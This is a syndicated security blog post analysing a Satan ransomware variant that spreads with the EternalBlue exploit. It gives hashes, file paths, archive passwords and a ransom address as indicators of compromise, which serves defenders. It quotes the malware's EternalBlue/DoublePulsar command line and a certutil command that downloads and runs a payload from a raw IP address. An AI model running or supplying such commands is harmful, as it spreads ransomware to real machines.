Satan ransomware adds EternalBlue exploit
Today, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.
Satan ransomware itself has been around since January 2017 as reported by Bleeping Computer.
In this blog post we’ll analyse a new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network, and consequently encrypt files.
Analysis
First up is a file inconspicuously named “sts.exe”, which may refer to “Satan spreader”.
- MD5: 12bc52fd9da66db3e63bfb196ceb9be6
- SHA1: 4508e3442673c149b31e3fffc29cc95f834975bc
- SHA256: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee
- Compilation timestamp: 2018-04-14 06:33:08
- VirusTotal report:
b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee
Figure 1 – download and extract two new files |
- ms.exe has password: iamsatancryptor
- client.exe has password: abcdefghijklmn
Figure 2 – UAC prompt |
Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named “Cryptor.exe”. Figure 2 shows the command line options.
Figure 3 – End of setup screen |
ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit – it does not appear to use its own.
cmd /c cd /D C:\Users\Alluse~1\&blue.exe –TargetIp & star.exe –OutConfig a –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload down64.dll –TargetIp
Figure 4 – Spreading attempt over SMB, port 445 |
down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the following command:
cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe
This payload is also packed with PECompact 2. As usual, any database-related services and processes will be stopped and killed, which it does to also encrypt those files possibly in use by another process.
Figure 5 – Database-related processes |
What’s new in this version of Satan, is that the exclusion list has changed slightly – it will not encrypt files with the following words in its path:
windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user
Figure 6 – Ransom note |
https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo
GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
HTTP/1.1
Connection: Keep-Alive
User-Agent: Winnet Client
Host: 198.55.107.149
2017-11-20 18:35:17 UTC ( 5 months ago )
For additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.
- C:\sts.exe
- C:\Cryptor.exe
- C:\ProgramData\ms.exe
- C:\ProgramData\client.exe
- C:\Windows\Temp\KSession
IOCs
*** This is a Security Bloggers Network syndicated blog from Blaze's Security Blog authored by Bart. Read the original post at: https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html